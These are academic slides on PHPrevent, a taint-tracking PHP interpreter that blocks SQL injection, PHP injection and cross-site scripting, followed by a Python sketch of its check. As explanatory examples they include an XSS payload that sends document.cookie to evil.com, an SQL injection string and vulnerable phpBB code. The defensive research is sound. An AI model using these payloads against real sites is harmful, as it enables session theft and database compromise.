Automatically Hardening Web Applications Using Precise Tainting

Anh Nguyen-Tuong, Salvatore Guarnieri, Doug Greene, Jeff Shirley, David Evans
University of Virginia

phpBB Worm
• December 21, 2004
• Over 40,000 sites defaced
• PHP injection
• Loads Perl scripts to spread itself
• Uses Google to search for other phpBB sites

phpBB Vulnerability
    $words = explode (' ', trim (htmlspecialchars (urldecode ($HTTP_GET_VARS ['highlight']))));
    ...
    $highlight_match[] = ... $words[$i] ...;
    ...
    … preg_replace (... $highlight_match ...)
Original user input: '_%2527_attack
User input after HTTP_GET_VARS call: \'_%27_attack
User input after explicit urldecode call: \'_'_attack

Classes of Attacks
• Code injection
  – Cause user-provided data to be executed while data is being processed
    • PHP injection (phpBB worm)
    • SQL injection
• Output generation
  – Cause user-provided data to be displayed to visitors of the website: Cross Site Scripting

SQL Injection
• Attacker constructs data that injects database commands
• Example:
    $res = executeQuery ("SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "' ");

Cross Site Scripting
• Inserts user-provided data, which may include JavaScript, into a webpage
• Executes with permissions of hosting website
• Simple example:
    <b onmouseover= 'location.href= "http://evil.com/steal.php?"
    + document.cookie'>Hello</b>

Importance
• Over 12% of Secunia Advisories
• 4 of last 10 advisories from FrSIRT
• Cross Site Scripting and Code Injection are responsible for many attacks on the internet
• It is very hard to write bug free code

Previous Approaches
• Static techniques
• Dynamic techniques before deployment
• Dynamic techniques during deployment

Static
• Static analyzers [Shanker+ 01]
• Code inspections [Fagan76]
• SQL prepared statements [Fisk04, Php05]
• Pros
  – No runtime overhead
  – Can be done before website is released to the public
• Cons
  – Coding practices may need to change
  – Inspections are only as good as the inspector
  – Many false positives

Dynamic Before Deployment
• Automated Test Suites: [Huang+ 04], [Tenable05], [Kavado05], [Offutt+ 04], [Watchfire05], [SPI05]
• Human testing
• Pros
  – Coding practices do not need to change
  – Attempts to simulate real world attacking conditions
• Cons
  – Only tests known attacks, cannot show absence of vulnerability
  – Requires developer effort to fix security holes

Automated Dynamic: Firewalls
• Incoming [Scott, Sharp 02]
• Incoming and Outgoing [Watchfire04], [Kavado05], [Teros04]
• Pros
  – No need to modify web service
• Cons
  – Only prevent recognized attacks
  – Coarse policies without knowing application semantics

Automated: Magic Quotes
• Escape all quotes supplied by a user
• Implemented in PHP and other scripting languages
• Extremely successful
  – Do not require the programmer to do anything
  – Prevent many SQL injection attacks
  – But, prevent only a specific class of attacks

Previous Work Limitations
• Being precise about what constitutes an attack is a lot of work
• Automated techniques suffer from not exploiting the application semantics
• We want a system that works as effortlessly as magic quotes, but prevents a wider class of attacks

Our Approach
• Fully automated
• Aware of application semantics
• Replace PHP interpreter with a modified interpreter that:
  – Keeps track of
    which information comes from untrusted sources (precise tainting)
  – Checks how untrusted input is used

[Figure: architecture diagram. Labels: Client, HTTP Server, Web Server, PHP Interpreter (PHPrevent), file.php, File System, Database, System APIs; arrows numbered 1 to 8.]

Coarse Grain Tainting
• Provided by many scripting languages (Perl, Ruby)
• Untrusted input is tainted
• Everything touched by tainted data becomes tainted
    $query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "' ";
Entire $query string is tainted

Precise Tainting
• Untrusted input is tainted
• Taint markings are maintained at character level
  – Depends on semantics of program
• Only really tainted data is tainted
    $query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "' ";
    $query = "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' ";

Precise Checking
• Wrappers around PHP functions that handle updating and checking precise taint information
• Conservative: no false negatives while minimizing false positives
  – Behavior only changes when an attack is likely

Preventing SQL Injection
• Parse the query using the Postgres SQL parser: identify interpreted text
• Disallow SQL keywords or delimiters in interpreted text that is tainted
  – Query is not sent to database
  – Error response is returned
    "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' ";

Preventing PHP Injection
• Disallow tainted data to be used in functions that treat input strings as PHP code or manipulate system state
  – We place wrappers around these functions to enforce this rule
• phpBB attack prevented by wrappers around preg_replace

Preventing Cross Site Scripting
• Wrappers around output functions
  – Buffer output and then parse the tainted output with HTML Tidy
• Check the parsed HTML against a white list to ensure there is no dangerous output
  – Dangerous content was determined by examining HTML grammar
  – Sanitize it by removing tags
    <b>Hello</b>   Safe
    <b
    onmouseover= 'location.href= "http://evil.com/steal.php?" + document.cookie'>Hello</b>   Unsafe

Current Status
• Modified PHP interpreter: PHPrevent
  – Prevents PHP injection, SQL injection and cross site scripting attacks
  – Overly conservative: we have not specified precise semantics for most PHP functions
• Performance
  – Initial measurements indicate performance overhead is acceptable

Future Work: Theory and Analysis
• End-to-end information flow security
• Replace ad-hoc taint marking with principled mechanism
  – Analyze data flow at interpreter level
  – Infer taint specifications for PHP functions using dynamic analysis
• Verify that taint marking in PHP specification is consistent with interpreter implementation

Future Work: Implementation
• Full implementation of precise tainting for PHP APIs
• Handle persistent state
  – Track tainting through database store
• Multiple tainting types with different checking rules
• Incorporate modifications into main PHP distribution

Summary
• Many websites are prone to attacks even after using current methods
• Our method:
  – Fully automated
  – Prevents large classes of attacks
  – Easy to deploy

Thank You
www.cs.virginia.edu/sammyg
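
Supplementary sketch: Precise Tainting and Preventing SQL Injection

The character-level tainting and SQL check described on the Precise Tainting and Preventing SQL Injection slides can be modeled roughly as follows. This is a minimal Python sketch, not PHPrevent's code: the names TString, build_query and sql_violation, the short keyword list, and the hand-written scanner are all assumptions made for illustration. The slides state that the real system works inside a modified PHP interpreter and uses the Postgres SQL parser; the scanner here is a stand-in that ignores escaped quotes.

```python
from dataclasses import dataclass

# Hypothetical, deliberately short keyword list (illustration only).
SQL_KEYWORDS = {"SELECT", "FROM", "WHERE", "AND", "OR", "UNION",
                "INSERT", "UPDATE", "DELETE", "DROP"}


@dataclass(frozen=True)
class TString:
    """A string plus one taint flag per character (hypothetical model)."""
    text: str
    taint: tuple

    @staticmethod
    def trusted(s):
        return TString(s, (False,) * len(s))

    @staticmethod
    def untrusted(s):
        return TString(s, (True,) * len(s))

    def __add__(self, other):
        # Concatenation keeps each character's own taint flag.
        return TString(self.text + other.text, self.taint + other.taint)


def build_query(user, pwd):
    """Mirror the slide's query; only $user and $pwd characters are tainted."""
    return (TString.trusted("SELECT real_name FROM users WHERE user = '")
            + TString.untrusted(user)
            + TString.trusted("' AND pwd = '")
            + TString.untrusted(pwd)
            + TString.trusted("' "))


def sql_violation(q):
    """Return the first tainted keyword or delimiter found in interpreted
    text (text outside string literals, plus the quotes themselves),
    or None if the query passes. Simplified: no escaped-quote handling."""
    in_literal = False
    i, n = 0, len(q.text)
    while i < n:
        ch = q.text[i]
        if ch == "'":
            if q.taint[i]:
                return "'"          # tainted quote acts as a delimiter
            in_literal = not in_literal
            i += 1
        elif in_literal:
            i += 1                  # tainted data inside a literal is fine
        elif ch.isalpha():
            j = i
            while j < n and (q.text[j].isalnum() or q.text[j] == "_"):
                j += 1
            word = q.text[i:j]
            if word.upper() in SQL_KEYWORDS and any(q.taint[i:j]):
                return word         # tainted SQL keyword
            i = j
        elif q.text.startswith("--", i) and any(q.taint[i:i + 2]):
            return "--"             # tainted comment marker
        elif ch == ";" and q.taint[i]:
            return ";"              # tainted statement separator
        else:
            i += 1
    return None


if __name__ == "__main__":
    print(sql_violation(build_query("' OR 1 = 1; -- ';", "")))  # attack from the slide
    print(sql_violation(build_query("alice", "s3cret")))        # ordinary login
```

Under coarse-grain tainting both queries would be tainted as a whole. In this model the ordinary login passes because its tainted characters stay inside string literals, while the attack input is rejected at its first tainted quote.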